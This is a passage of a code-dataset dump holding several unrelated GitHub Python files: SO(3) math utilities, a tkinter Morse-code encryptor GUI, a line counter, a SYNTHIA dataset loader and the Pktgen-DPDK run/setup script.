com)\n","repo_name":"tierin/toxicso","sub_path":"save_year_posts.py","file_name":"save_year_posts.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"31865217549","text":"# Author(s): Justice Mason\n# Project: DEVS/RODEN \n# Package: Math Utilities\n# Date: 12/17/21\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\n\nfrom models.lie_tools import log_map, map_to_lie_algebra\nfrom utils.physics_utils import rk4_step\n\ndef distance_so3(R1: torch.Tensor, R2: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Distance function for SO(3).\n \n ...\n \n Parameters\n ----------\n R1\n R2\n \n Returns\n -------\n distance\n \n Notes\n -----\n \n \"\"\"\n product = torch.einsum('bij, bkj -> bik', R2, R1)\n trace = torch.einsum('bii', product)\n \n dist = 0.5 * (trace - 1)\n eps = 1e-2\n \n dist_ = dist.clamp(min=-1+eps, max=1-eps)\n distance = torch.acos(dist_)\n \n return distance\n\ndef torch_matrix_power(X: torch.Tensor, n) -> torch.Tensor:\n \"\"\"\n Funciton to calculate the matrix power.\n \n ...\n \n Parameters\n ----------\n X : torch.Tensor\n Input matrix of shape (bs, n, n).\n \n n: float or in\n Power to raise matrix.\n \n Returns\n -------\n Xn : torch.Tensor\n Matrix raised to power n.\n \n Notes\n -----\n \n \"\"\"\n evals, evecs = torch.linalg.eig(X) # get eigendecomposition\n evals = evals.real # get real part of (real) eigenvalues\n evecs = evecs.real\n \n evpow = evals**n # raise eigenvalues to fractional power\n Xn = torch.matmul(evecs, torch.matmul(torch.diag_embed(evpow), torch.linalg.inv(evecs)))\n \n return Xn\n\ndef project_so3(R: torch.Tensor):\n \"\"\"\n Function that projects R^{3 \\times 3} on to SO(3).\n \n ...\n \n \"\"\"\n assert torch.any(R.isnan()) == False and torch.any(R.isinf()) == False\n \n prod = torch.bmm(R, R.permute(0, 2, 1))\n C = torch.bmm(torch_matrix_power(X=prod, n=0.5), R)\n \n return C\n\ndef quat_omega(w: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Function to generate the \\Omega(\\omega) matrix in the kinematic differential equations for quaternions.\n \n ...\n \n Parameters\n ----------\n w : torch.Tensor\n Angular velocity\n \n Returns\n -------\n Q : torch.Tensor\n Matrix for KDEs of quaternions\n \n Notes\n -----\n Q = \\Omega(w) = \\[-S(w) w \\] \\in su(2)\n \\[-w^{T} 0 \\]\n \n \"\"\"\n bs, _, = w.shape\n S_w = map_to_lie_algebra(v=w)\n \n Q = torch.zeros((bs, 4, 4), device=w.device)\n Q[:, :3, :3] = -S_w\n Q[:, -1, :3] = -w\n Q[:, :3, -1] = w\n \n return Q\n \ndef pd_matrix(diag: torch.Tensor, off_diag: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Function constructing postive-definite matrix from diag/off-diag entries.\n \n ...\n \n Parameters\n ----------\n diag : torch.Tensor\n Diagonal elements of PD matrix.\n \n off-diag: torch.Tensor\n Off-diagonal elements of PD matrix.\n \n Returns\n -------\n matrix_pd : torch.Tensor\n Calculated PD matrix.\n \n Notes\n -----\n \n \"\"\"\n diag_dim = diag.shape[0]\n \n L = torch.diag_embed(diag)\n ind = np.tril_indices(diag_dim, k=-1)\n flat_ind = np.ravel_multi_index(ind, (diag_dim, diag_dim))\n \n L = torch.flatten(L, start_dim=0)\n L[flat_ind] = off_diag\n L = torch.reshape(L, (diag_dim, diag_dim))\n \n matrix_pd = L @ L.T + (1 * torch.eye(3, device=diag.device))\n \n return matrix_pd\n\ndef symmetric_matrix(diag: np.ndarray, off_diag: np.ndarray) -> np.ndarray:\n \"\"\"\n Function to make symmetric matrix from diagonal and off-diagonal elements.\n \n ...\n \n Parameters\n ----------\n diag : np.ndarray\n Diagonal entries\n \n off_diag : np.ndarray\n Off-diagonal entries\n \n Returns\n -------\n sym_matrix : np.ndarray\n Symmetric matrix\n Notes\n -----\n \n \"\"\"\n lt_id = np.tril_indices(3, k=-1)\n ut_id = np.triu_indices(3, k=1)\n A = np.zeros((3,3))\n \n A[ut_id] = off_diag\n A[lt_id] = off_diag\n \n sym_matrix = A + np.diag(diag)\n return sym_matrix\n\ndef sample_points_on_sphere(radius: float, theta_arr: np.ndarray, phi_arr: np.ndarray) -> np.ndarray:\n \"\"\"\n Function to sample points on sphere given radius and angles \\phi and \\theta.\n \n ...\n \n Parameters\n ----------\n radius : float\n Radius of desired sphere.\n \n tehta_arr : np.ndarray\n Array of theta values to be sampled on given sphere.\n \n phi_arr : np.ndarray\n Array of phi values to be sampled on given sphere.\n \n Returns\n -------\n samples : np.ndarray\n Array of sampled points from given sphere.\n \n Notes\n -----\n Using (r, \\theta, \\phi) \\rightarrow (x, y, z) convention.\n \n \"\"\"\n \n cos = np.cos\n sin = np.sin\n r = radius\n \n assert r > 0.0, \"sphere's radius must be postive-value and greater than zero.\"\n \n x = r * np.multiply(sin(phi_arr), cos(theta_arr))\n y = r * np.multiply(sin(phi_arr), sin(theta_arr))\n z = r * sin(phi_arr)\n \n assert (y.shape == z.shape and x.shape == y.shape), \"XYZ coordinate shapes are not matching.\"\n \n samples = np.concatenate((x, y, z), axis=0)\n return samples\n\ndef rotate(img, theta):\n \"\"\"\n Rotation function used in equivariance loss from Falorsi et al., 2018.\n \n ...\n \n \"\"\"\n cos = torch.cos(theta)\n sin = torch.sin(theta)\n zero = torch.zeros_like(theta)\n affine = torch.stack([cos, -sin, zero, sin, cos, zero], 1).view(-1, 2, 3)\n grid = F.affine_grid(affine, img.size(), align_corners=True)\n return F.grid_sample(img, grid, align_corners=True)\n","repo_name":"jjmason687/LearningSO3fromImages","sub_path":"utils/math_utils.py","file_name":"math_utils.py","file_ext":"py","file_size_in_byte":5609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"20677631463","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import *\nimport tkinter.font as font\nfrom PIL import Image, ImageTk\n\n# this is the function called when the button is clicked\nimport TxtDecry\nimport TxtEncry\nimport HiddenInTxt\nimport ExtractFromText\nimport DataHideInImage\nimport DataExtractFromImage\n\n# function for Initializing\ndef btnInitial():\n import Morse1\n import Morse2\n import Messages\n\n\n# function for Text Encryption\ndef btnTxtEncry():\n TxtEncry.main1()\n\n\n# Function for text decryption\ndef btnTxtDecry():\n TxtDecry.main1()\n\n\n# Function for data hiding in text\ndef btnDataTxt():\n HiddenInTxt.main1()\n\n\n# function for data extraction from text\ndef btnDataExt():\n ExtractFromText.main1()\n\n\n# function for data hiding in image\ndef btnImgHide():\n DataHideInImage.main1()\n\ndef btnImgExtr():\n DataExtractFromImage.main1()\n\nroot = Tk()\n\n# This is the section of code which creates the main window\nroot.geometry('800x650')\nroot.configure(background='#001533')\nroot.title('Encryptor')\n\n# --------Fonts---------\n\nmfont = font.Font(family=\"Fixedsys\",\n size=\"40\",\n weight=\"bold\")\n\n# Name of the Program\nLabel(root, text='Morse Code Encryptor', fg=\"#F01154\", bg='#001533', font=mfont).place(x=85, y=24)\n\n# gratitude\nLabel(root, text='Thanks for using the Machine', bg='#001533', fg=\"#04f8f8\", font=('helvetica', 12, 'bold')).place(\n x=270, y=100)\n\n# Intialzing button\nButton(root, text='Initialize the Machine', fg=\"#000000\",\n bg='#DB4D61',\n font=('verdana', 16, 'normal'),\n borderwidth=0,\n activebackground=\"#DB4D61\", command=btnInitial).place(\n x=270, y=140)\n\n# Menu label\nLabel(root, text='Process Menu', fg=\"#04f8f8\", bg='#001533', font=('helvatica', 18, 'normal')).place(x=100, y=198)\n\n#By TEAM 47 label\nLabel(root, text='By TEAM 47', fg=\"#04f8f8\", bg='#001533', font=('FIXEDSYS', 14, 'normal')).place(x=600, y=90)\n\n# Data encryption in text button\n#Use it if Img Button is req btn = PhotoImage(file=\"./button_encryption-of-text.png\") and paste it after bg -\"image=btn,\"\n\nButton(root,text=\"1.Encryption of Text \",\n fg=\"#000000\",\n bg='#1AD5FF',\n font=('segoe ui', 16, 'normal'),\n borderwidth=0,\n activebackground=\"#DB4D61\", command=btnTxtEncry).place(x=100, y=244)\n\n# Data decryption in text button\nButton(root, text='2.Decryption of Morse Code ', fg=\"#000000\",\n bg='#1AD5FF',\n font=('segoe ui', 16, 'normal'),\n borderwidth=0,\n activebackground=\"#DB4D61\", command=btnTxtDecry).place(x=100, y=306)\n\n# Data hiding in text button\nButton(root, text='3.Data Hiding in Text ', fg=\"#000000\",\n bg='#1AD5FF',\n font=('segoe ui', 16, 'normal'),\n borderwidth=0,\n activebackground=\"#DB4D61\", command=btnDataTxt).place(x=100, y=367)\n\n# Data extraction from text button\nButton(root, text='4.Data Extraction from Text ',\n fg=\"#000000\",\n bg='#1AD5FF',\n font=('segoe ui', 16, 'normal'),\n borderwidth=0,\n activebackground=\"#DB4D61\", command=btnDataExt).place(\n x=100, y=431)\n\n# Data hiding in image button\nButton(root, text='5.Data Hiding in Image ',\n fg=\"#000000\",\n bg='#1AD5FF',\n font=('segoe ui', 16, 'normal'),\n borderwidth=0,\n activebackground=\"#DB4D61\",\n command=btnImgHide).place(x=100, y=490)\n\n# Data Extracting from image button\nButton(root, text='6.Data Extracting from Image',\n fg=\"#000000\",\n bg='#1AD5FF',\n font=('segoe ui', 16, 'normal'),\n borderwidth=0,\n activebackground=\"#DB4D61\",\n command=btnImgExtr).place(x=100, y=550)\n\n# exit button\nexit_button = Button(root, text=\"EXIT\", fg=\"#001533\",\n activeforeground='#04f8f8',\n activebackground='#001533',\n borderwidth=0,\n bg='#04f8f8', font=('verdana', 16, 'normal'),\n command=root.destroy)\nexit_button.place(x=700, y=595)\n\n#-------LOGO-------\nframe = Frame(root, width=250, height=250,bd=0,bg=\"#001533\")\nframe.pack()\nframe.place(x=470,y=240)\n\n# Create an object of tkinter ImageTk\nimg = ImageTk.PhotoImage(Image.open(\"1.png\"))\n\n# Create a Label Widget to display the text or Image\nlabel = Label(frame, image = img,bd=0)\nlabel.pack()\n\n\nroot.mainloop()\n","repo_name":"Ved987/Morse-Code-Encryptor-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"24455292615","text":"import sys\n\ndef main():\n print(search_file_in_dir())\n\ndef search_file_in_dir():\n try:\n filename = get_correct_filename(sys.argv)\n return read_file(filename)\n except FileNotFoundError:\n print(\"File does not exist\")\n sys.exit(1)\n\n\ndef read_file(filename):\n with open(filename, 'r') as file:\n lines = file.readlines()\n code_lines = 0\n for line in lines:\n if line.strip() and not line.strip().startswith('#'):\n code_lines += 1\n return code_lines\n\n\ndef get_correct_filename(argv):\n if len(argv) < 2:\n print(\"Too few command-line arguments\")\n sys.exit(1)\n elif len(argv) > 2:\n print(\"Too many command-line arguments\")\n sys.exit(1)\n else:\n filename = argv[1].lower().lstrip()\n if not filename.endswith(\".py\"):\n print(\"Not a python file\")\n sys.exit(1)\n else:\n return filename\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MrsMystique/python-repo","sub_path":"PythonCS50P/all tasks cs50P/lines.py","file_name":"lines.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"74442022027","text":"import numpy as np\nfrom os import listdir, path, makedirs, environ\nfrom tqdm import tqdm\nimport tarfile\nimport cv2\nimport shutil\nimport json\nfrom sklearn.model_selection import train_test_split\nfrom copy import deepcopy\n\nfrom .data_baseclass import DataBaseclass\nfrom .augmentation import augmentate\nfrom .synthia import SYNTHIA_BASEPATH, \\\n one_channel_image_reader\n\n\n# Set label information according to synthia README\nLABELINFO = {\n 0: {'name': 'void', 'color': [0, 0, 0]},\n 1: {'name': 'sky', 'color': [128, 128, 128]},\n 2: {'name': 'building', 'color': [128, 0, 0]},\n 3: {'name': 'road', 'color': [128, 64, 128]},\n 4: {'name': 'sidewalk', 'color': [0, 0, 192]},\n 5: {'name': 'fence', 'color': [64, 64, 128]},\n 6: {'name': 'vegetation', 'color': [128, 128, 0]},\n 7: {'name': 'pole', 'color': [192, 192, 128]},\n 8: {'name': 'car', 'color': [64, 0, 128]},\n 9: {'name': 'traffic sign', 'color': [192, 128, 128]},\n 10: {'name': 'pedestrian', 'color': [64, 64, 0]},\n 11: {'name': 'bicycle', 'color': [0, 128, 192]}\n}\n\n\nclass SynthiaCityscapes(DataBaseclass):\n \"\"\"Driver for SYNTHIA dataset (http://synthia-dataset.net/).\"\"\"\n\n _data_shape_description = {\n 'rgb': (None, None, 3), 'depth': (None, None, 1), 'labels': (None, None)}\n _num_default_classes = 12\n\n def __init__(self, base_path=SYNTHIA_BASEPATH, force_preprocessing=False,\n batchsize=1, resize=False, in_memory=False, **data_config):\n\n config = {\n 'augmentation': {\n 'crop': [1, 240],\n 'scale': [.4, 0.7, 1.5],\n 'vflip': .3,\n 'hflip': False,\n 'gamma': [.4, 0.3, 1.2],\n 'rotate': [.4, -13, 13],\n 'shear': [0, 0.01, 0.03],\n 'contrast': [.3, 0.5, 1.5],\n 'brightness': [.2, -40, 40]\n },\n 'labels': {\n 'lanemarkings': False\n }\n }\n config.update(data_config)\n config.update({'resize': resize})\n self.config = config\n\n if not path.exists(base_path):\n message = 'ERROR: Path to SYNTHIA dataset does not exist.'\n print(message)\n raise IOError(1, message, base_path)\n\n self.basepath = path.join(base_path, 'RAND_CITYSCAPES')\n\n # Every sequence got their own train/test split during preprocessing. According\n # to the loaded sequences, we now collect all files from all sequence-subsets\n # into one list.\n if in_memory and 'TMPDIR' in environ:\n print('INFO loading dataset into memory')\n # first load the tarfile into a closer memory location, then load all the\n # images\n tar = tarfile.open(path.join(SYNTHIA_BASEPATH, 'RAND_CITYSCAPES.tar.gz'))\n localtmp = environ['TMPDIR']\n tar.extractall(path=localtmp)\n tar.close()\n self.basepath = localtmp\n with open(path.join(self.basepath, 'train_test_split.json'), 'r') as f:\n split = json.load(f)\n trainset = [{'image': self._load_data(filename)}\n for filename in tqdm(split['trainset'])]\n testset = [{'image': self._load_data(filename)}\n for filename in tqdm(split['testset'])]\n else:\n if in_memory:\n print('INFO Environment Variable TMPDIR not set, could not unpack data '\n 'and load into memory\\n'\n 'Now trying to load every image seperately')\n with open(path.join(self.basepath, 'train_test_split.json'), 'r') as f:\n split = json.load(f)\n trainset = [{'image_name': filename} for filename in split['trainset']]\n testset = [{'image_name': filename} for filename in split['testset']]\n\n measureset, testset = train_test_split(testset, test_size=0.5, random_state=1)\n\n # Update labelinfo according to config\n labelinfo = deepcopy(LABELINFO)\n if self.config['labels']['lanemarkings']:\n labelinfo[12] = {'name': 'lanemarking', 'color': [0, 192, 0]}\n\n # Intitialize Baseclass\n DataBaseclass.__init__(self, trainset, measureset, testset, labelinfo)\n\n @property\n def one_hot_lookup(self):\n return np.arange(len(self.labelinfo), dtype=np.int)\n\n def _preprocessing(self, sequence):\n rootpath = path.join(self.basepath, sequence, 'GT')\n\n for direction in ['F', 'B', 'L', 'R']:\n inpath, outpath = (path.join(rootpath, pref,\n 'Stereo_Right/Omni_{}'.format(direction))\n for pref in ['LABELS', 'LABELS_NPY'])\n\n if path.exists(outpath):\n shutil.rmtree(outpath)\n makedirs(outpath)\n for filename in tqdm(listdir(inpath)):\n array = one_channel_image_reader(path.join(inpath, filename),\n np.uint8)\n np.save(path.join(outpath, filename.split('.')[0]), array)\n\n if sequence == 'RAND_CITYSCAPES':\n # There are no different directions for this sequence.\n break\n\n # create train-test-split if necessary\n if not path.exists(path.join(self.basepath, sequence, 'train_test_split.json')):\n print(\"INFO: Creating Train-Test-Split\")\n filenames = [filename.split('.')[0] for filename\n in listdir(path.join(rootpath, 'LABELS/Stereo_Right/Omni_F'))]\n trainset, testset = train_test_split(filenames, test_size=0.2)\n with open(path.join(self.basepath, sequence, '/train_test_split.json'),\n 'w') as f:\n json.dump({'trainset': trainset, 'testset': testset}, f)\n\n def _load_data(self, image_name):\n filetype = {'rgb': 'png', 'depth': 'png', 'labels': 'npy'}\n\n rgb_filename, depth_filename, groundtruth_filename = (\n path.join(self.basepath, '{}/Stereo_Right/Omni_F/{}.{}'\n .format(pref, image_name, filetype[modality]))\n for pref, modality in zip(['RGB', 'Depth', 'GT/LABELS_NPY'],\n ['rgb', 'depth', 'labels']))\n\n blob = {}\n blob['rgb'] = cv2.imread(rgb_filename)\n # flag 2 -> read image with 16bit depth\n blob['depth'] = cv2.imread(depth_filename, 2)\n labels = np.load(groundtruth_filename)\n # Dirty fix for the class mappings as in adapnet paper\n labels[labels == 12] = 11 # motorcycle -> bicycle\n labels[labels == 13] = 12 # parking spot -> lanemarking\n labels[labels == 14] = 0 # road_work -> void\n labels[labels == 15] = 0 # traffic light -> void\n labels[labels == 16] = 0 # terrain -> void\n labels[labels == 17] = 11 # rider -> bicycle\n labels[labels == 18] = 8 # truck -> car\n labels[labels == 19] = 8 # bus -> car\n labels[labels == 20] = 0 # train -> void\n labels[labels == 21] = 0 # wall -> void\n labels[labels == 22] = 12 # lanemarking\n\n if not self.config['labels']['lanemarkings']:\n labels[labels == 12] = 0 # lanemarking -> void\n\n blob['labels'] = labels\n\n if self.config['resize']:\n blob['rgb'] = cv2.resize(blob['rgb'], (768, 384),\n interpolation=cv2.INTER_LINEAR)\n for m in ['depth', 'labels']:\n blob[m] = cv2.resize(blob[m], (768, 384),\n interpolation=cv2.INTER_NEAREST)\n return blob\n\n def _get_data(self, image_name=False, image=False, training_format=True):\n \"\"\"Returns data for one given image number from the specified sequence.\"\"\"\n if not image_name and not image:\n # one of the two should be specified\n assert False\n if image_name:\n blob = self._load_data(image_name)\n if image:\n blob = {}\n for m in image:\n blob[m] = image[m].copy()\n\n if training_format:\n blob = augmentate(blob,\n scale=self.config['augmentation']['scale'],\n crop=self.config['augmentation']['crop'],\n hflip=self.config['augmentation']['hflip'],\n vflip=self.config['augmentation']['vflip'],\n gamma=self.config['augmentation']['gamma'],\n contrast=self.config['augmentation']['contrast'],\n brightness=self.config['augmentation']['brightness'],\n rotate=self.config['augmentation']['rotate'],\n shear=self.config['augmentation']['shear'])\n\n # Format labels into one-hot\n blob['labels'] = np.array(self.one_hot_lookup ==\n blob['labels'][:, :, None]).astype(int)\n\n # We have to add a dimension for the channels, as there is only one and the\n # dimension is omitted.\n blob['depth'] = np.expand_dims(blob['depth'], 3)\n\n # Force the image dimension to be multiple of 16\n h, w, _ = blob['rgb'].shape\n h_c, w_c = [d - (d % 16) for d in [h, w]]\n if h_c != h or w_c != w:\n for m in ['rgb', 'depth', 'labels']:\n blob[m] = blob[m][:h_c, :w_c, ...]\n\n return blob\n","repo_name":"ethz-asl/modular_semantic_segmentation","sub_path":"xview/datasets/synthia_cityscapes.py","file_name":"synthia_cityscapes.py","file_ext":"py","file_size_in_byte":9545,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"82"} +{"seq_id":"6703732362","text":"import sys\nimport os\nimport getopt\nimport subprocess\nimport glob\nimport types\nimport importlib.machinery\nimport importlib.util\nimport shutil\n\ndef usage():\n '''Print usage information for the program'''\n argv0 = os.path.basename(sys.argv[0])\n print(\"\"\"\nUsage:\n------\n %(argv0)s [options] [config_name]\n\n Where config_name is the one of the defined configuration files if no config\n file is listed then the ./default.cfg file will be used. If a cfg directory\n is located in the current directory then it will be searched for a match.\n\n The config_name is the name of the file without path and .cfg extension.\n\nOptions:\n--------\n -h, --help, -u, --usage:\n Display usage information and quit\n\n -l, --list:\n Print a list of known configuration files\n\n -n, --norun\n Just create the command line and outpuyt the line with no-running.\n\n -v, --verbose\n Print out more information\n\nExamples:\n---------\n To display current list of configuration files:\n %(argv0)s --list\n\n To run a config file:\n %(argv0)s default\n\n The configuration file name is always suffixed by .cfg as in default.cfg.\n The search location of the configuration files is .:./cfg\n\n \"\"\" % locals()) # replace items from local variables\n sys.exit(0)\n\ndef err_exit(str):\n ''' print the error string and exit '''\n print(str)\n sys.exit(1)\n\ndef find_file(fn, t):\n ''' Find the first file matching the arg value '''\n f = os.path.splitext(fn)\n if f[1] == t:\n fn = f[0]\n for f in file_list('cfg', t):\n b = os.path.basename(f)\n if os.path.splitext(b)[0] == fn:\n return f\n return None\n\ndef mk_tuple(lst, s):\n ''' Convert a string to a tuple if needed '''\n t = {}\n\n if type(lst[s]) != tuple:\n if verbose:\n print('Not a Tuple', type(lst[s]), lst[s])\n t[s] = tuple([lst[s],])\n else:\n if verbose:\n print('A tuple', type(lst[s]), lst[s])\n t[s] = lst[s]\n\n if verbose:\n print('New t[s]', type(t[s]), t[s])\n\n return t[s]\n\ndef add_ld_options(s, arg_list):\n ''' Append LD_LIBRARY_PATH option to arg list '''\n if s in cfg.run:\n str = 'LD_LIBRARY_PATH=.'\n for a in mk_tuple(cfg.run, s):\n _p = a % globals()\n str = str + ':' + _p\n arg_list.append(str)\n\ndef add_run_options(s, arg_list, p):\n ''' Append options to arg list '''\n if s in cfg.run:\n for a in mk_tuple(cfg.run, s):\n if p is not None:\n arg_list.append(p)\n\n _p = a % globals()\n arg_list.append(_p)\n\ndef add_setup_options(s, arg_list):\n ''' Append options to arg list '''\n if s in cfg.setup:\n for a in mk_tuple(cfg.setup, s):\n arg_list.extend(a.split(' '))\n\ndef file_list(directory, file_extension):\n ''' Return list of configuration files '''\n fileiter = (os.path.join(root, f)\n for root, _, files in os.walk(directory)\n for f in files)\n return (f for f in fileiter if os.path.splitext(f)[1] == file_extension)\n\ndef load_cfg(fname):\n ''' Load the configuration or .cfg file as a python data file '''\n\n if not os.path.exists(fname):\n err_exit(\"Config file %s does not exists\\n\" % fname)\n\n try:\n configuration_file = open(fname)\n except:\n err_exit(\"Error: unable to open file %s\\n\" % fname)\n\n global cfg\n loader = importlib.machinery.SourceFileLoader('cfg', fname)\n spec = importlib.util.spec_from_loader(loader.name, loader)\n cfg = importlib.util.module_from_spec(spec)\n loader.exec_module(cfg)\n print(cfg)\n\n configuration_file.close()\n shutil.rmtree('cfg/__pycache__')\n\n return cfg\n\ndef show_configs():\n ''' Show configuration files '''\n\n print(\"Configurations:\")\n print(\" %-16s - %s\" % (\"Name\", \"Description\"))\n print(\" %-16s %s\" % (\"----\", \"-----------\"))\n\n for fname in file_list('cfg', '.cfg'):\n base = os.path.splitext(os.path.basename(fname))[0]\n\n try:\n cfg = load_cfg(fname)\n\n if not cfg.description:\n cfg.description = \"\"\n print(\" %-16s - %s\" % (base, cfg.description))\n except NameError:\n sys.stderr.write(\"We were unable to load the module \" + fname + \\\n \" If you do not plan to use this module you can safely ignore this \" \\\n \"message.\\n\")\n finally:\n # reset the descriptoin to empty, for next loop/file\n cfg.description = \"\"\n\n sys.exit(0)\n\ndef run_cfg(cfg_file):\n ''' Run the configuration in the .cfg file '''\n\n cfg = load_cfg(cfg_file)\n\n args = []\n\n add_run_options('exec', args, None)\n\n add_ld_options('ld_path', args)\n\n if not 'app_path' in cfg.run:\n err_exit(\"'app_path' variable is missing from cfg.run in config file\")\n\n if not 'app_name' in cfg.run:\n err_exit(\"'app_name' variable is missing from cfg.run in config file\")\n\n # convert the cfg.run['app_name'] into a global variable used in\n # the creation of the applicaiton/path. app_name must be a global variable.\n global app_name\n app_name = cfg.run['app_name']\n\n # Try all of the different path versions till we find one.\n fname = None\n for app in cfg.run['app_path']:\n fn = app % globals()\n print(\" Trying %s\" % fn)\n if os.path.exists(fn):\n fname = fn\n if verbose:\n print(\"Found %s\" % fn)\n break\n\n if not fname:\n err_exit(\"Error: Unable to locate application %s\" % cfg.run['app_name'])\n\n args.extend([fname])\n\n add_run_options('cores', args, '-l')\n add_run_options('nrank', args, '-n')\n add_run_options('proc', args, '--proc-type')\n add_run_options('log', args, '--log-level')\n add_run_options('prefix', args, '--file-prefix')\n add_run_options('shared', args, '-d')\n add_run_options('blocklist', args, '-b')\n add_run_options('allowlist', args, '-a')\n add_run_options('vdev', args, '--vdev')\n add_run_options('plugin', args, '-d')\n args.extend([\"--\"])\n add_run_options('opts', args, None)\n add_run_options('map', args, '-m')\n add_run_options('pcap', args, '-s')\n add_run_options('theme', args, '-f')\n add_run_options('loadfile', args, '-f')\n add_run_options('logfile', args, '-l')\n\n # Convert the args list to a single string with spaces.\n str = \"\"\n for a in args:\n str = str + \"%s \" % a\n\n # Output the command line\n print(str)\n if norun:\n return\n\n if verbose:\n print(\"Command line:\")\n print(args)\n\n subprocess.call(args)\n\n subprocess.call(['stty', 'sane'])\n\ndef num_sockets(hpath):\n ''' Count the number of sockets in the system '''\n\n sockets = 0\n for i in range(0, 8):\n if os.path.exists(hpath % i):\n sockets = sockets + 1\n\n return sockets\n\ndef setup_cfg(cfg_file):\n ''' Setup the system by adding modules and ports to dpdk control '''\n\n cfg = load_cfg(cfg_file)\n\n print(\"Setup DPDK to run '%s' application from %s file\" %\n (cfg.run['app_name'], cfg_file))\n\n sys_node = '/sys/devices/system/node/node%d/hugepages'\n hugepage_path = sys_node + '/hugepages-2048kB/nr_hugepages'\n\n # calculate the number of sockets in the system.\n nb_sockets = int(num_sockets(hugepage_path))\n if nb_sockets == 0:\n nb_sockets = 1\n\n p = subprocess.Popen(['sysctl', '-n', 'vm.nr_hugepages'],\n stdout=subprocess.PIPE)\n\n # split the number of hugepages between the sockets\n nb_hugepages = int(p.communicate()[0]) / nb_sockets\n\n if verbose:\n print(\" Hugepages per socket %d\" % nb_hugepages)\n\n if verbose:\n print(\" modprobe the 'uio' required module\")\n\n if 'uio' in cfg.setup:\n u = cfg.setup['uio']\n\n if u == 'igb_uio':\n subprocess.call(['sudo', 'modprobe', \"uio\"])\n\n if verbose:\n print(\" Remove %s if already installed\" % u)\n\n ret = subprocess.call(['sudo', 'rmmod', u])\n if ret > 0:\n print(\" Remove of %s, displayed an error ignore it\" % u)\n\n uio = (\"%s/%s/kmod/%s.ko\" % (sdk, target, u))\n if verbose:\n print(\" insmode the %s module\" % uio)\n subprocess.call(['sudo', 'insmod', uio])\n\n if u == 'vfio-pci':\n ret = subprocess.call(['sudo', 'rmmod', u])\n if ret > 0:\n print(\" Remove of %s, displayed an error ignore it\" % u)\n\n if verbose:\n print(\" modprobe the %s module\" % u)\n subprocess.call(['sudo', 'modprobe', u])\n\n if u == 'uio_pci_generic':\n ret = subprocess.call(['sudo', 'rmmod', u])\n if ret > 0:\n print(\" Remove of %s, displayed an error ignore it\" % u)\n\n if verbose:\n print(\" insmode the %s module\" % u)\n subprocess.call(['sudo', 'modprobe', u])\n else:\n if u == 'vfio-pci':\n ret = subprocess.call(['sudo', 'rmmod', u])\n if ret > 0:\n print(\" Remove of %s, displayed an error ignore it\" % u)\n\n if verbose:\n print(\" modprobe the %s module\" % u)\n subprocess.call(['sudo', 'modprobe', u])\n\n for i in range(0, nb_sockets):\n fn = (hugepage_path % i)\n if verbose:\n print(\" Set %d socket to %d hugepages\" % (i, nb_hugepages))\n subprocess.call(['sudo', '-E', 'sh', '-c', 'eval',\n 'echo %s > %s' % (nb_hugepages, fn)])\n\n # locate the binding tool\n if os.path.exists(\"/usr/local/bin/dpdk-devbind.py\"):\n script =\"/usr/local/bin/dpdk-devbind.py\"\n else:\n if os.path.exists(\"%s/bin/dpdk-devbind.py\" % sdk):\n script = \"%s/bin/dpdk-devbind.py\" % sdk\n else:\n if os.path.exists(\"%s/usertools/dpdk-devbind.py\" % sdk):\n script = \"%s/usertools/dpdk-devbind.py\" % sdk\n else:\n err_exit(\"Error: Failed to find dpdk-devbind.py or dpdk_nic_bind.py\")\n\n # build up the system command line to be executed\n args = []\n add_setup_options('exec', args)\n\n args.extend([script])\n\n args.append('-b')\n args.append(cfg.setup['uio'])\n\n add_setup_options('devices', args)\n\n if verbose:\n print(\" Bind following devices to DPDK:\")\n for a in cfg.setup['devices']:\n print(\" %s\" % a)\n print(args)\n\n subprocess.call(args)\n\ndef parse_args():\n ''' Parse the command arguments '''\n\n global run_flag, verbose, norun\n\n run_flag = True\n verbose = False\n norun = False\n\n cfg_file = \"./cfg/default.cfg\"\n\n if len(sys.argv) <= 1:\n print(\"*** Pick one of the following config files\\n\")\n show_configs()\n\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"hulsvn\",\n [\"help\", \"usage\", \"list\", \"setup\", \"verbose\", \"norun\", ])\n\n except getopt.GetoptError as error:\n print(str(error))\n usage()\n\n for opt, _ in opts:\n if opt == \"--help\" or opt == \"-h\":\n usage()\n if opt == \"--usage\" or opt == \"-u\":\n usage()\n if opt == \"--list\" or opt == \"-l\":\n show_configs()\n if opt == \"--setup\" or opt == \"-s\":\n run_flag = False\n if opt == \"--verbose\" or opt == \"-v\":\n verbose = True\n if opt == \"--norun\" or opt == \"-n\":\n norun = True\n\n if not args or len(args) > 1:\n usage()\n\n fn = find_file(args[0], '.cfg')\n if not fn:\n f = args[0]\n if os.path.splitext(args[0])[1] != '.cfg':\n f = args[0] + '.cfg'\n print(\"*** Config file '%s' not found\" % f)\n print(\" Make sure you are running this command in pktgen top directory\")\n print(\" e.g. cd Pktgen-DPDK; ./tools/run.py default\")\n show_configs()\n else:\n cfg_file = fn\n\n return cfg_file\n\ndef main():\n '''program main function'''\n\n global sdk, target\n\n sdk = os.getenv(\"RTE_SDK\")\n\n target = os.getenv(\"RTE_TARGET\")\n\n print(\">>> sdk '%s', target '%s'\" % (sdk, target))\n\n cfg_file = parse_args()\n\n if run_flag:\n run_cfg(cfg_file)\n else:\n setup_cfg(cfg_file)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pktgen/Pktgen-DPDK","sub_path":"tools/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":14055,"program_lang":"python","lang":"en","doc_type":"code","stars":303,"dataset":"github-code","pt":"82"} 